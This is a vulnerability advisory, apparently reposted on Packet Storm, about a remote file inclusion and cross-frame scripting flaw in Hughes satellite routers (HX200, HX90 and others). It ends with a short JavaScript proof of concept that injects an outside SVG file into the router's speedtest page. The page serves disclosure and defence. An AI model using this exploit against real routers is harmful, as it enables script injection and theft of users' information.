what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Hughes Satellite Router Remote File Inclusion Cross Frame Scripting

Hughes Satellite Router Remote File Inclusion Cross Frame Scripting
Posted Dec 29, 2022
Authored by LiquidWorm | Site zeroscience.mk

Hughes Satellite Router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application. Affected versions include HX200 8.3.1.14, HX90 6.11.0.5, HX50L 6.10.0.18, HN9460 8.2.0.48, and HN7000S 6.9.0.37.

tags | exploit, remote, file inclusion
SHA-256 | 01732a937c344613efd7c1ef744f546511c874deecd845ef0ca2d232baf0e177

Hughes Satellite Router Remote File Inclusion Cross Frame Scripting

Change Mirror Download

Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting


Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37

Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.

Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.

Tested on: WindWeb/1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php


23.12.2022

--


snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//

//URL https://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()

console.log("Loading Broadband Satellite Browsing Test");

//Add cross-frame file include (http only)
AddURLtoList("https://www.zeroscience.mk/pentest/XSS.svg");

console.log("Calling StartTest()");
StartTest()

//console.log("Calling DoTest()");
//DoTest()

//Unload weapon
//document.getElementById("URLList").remove();
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close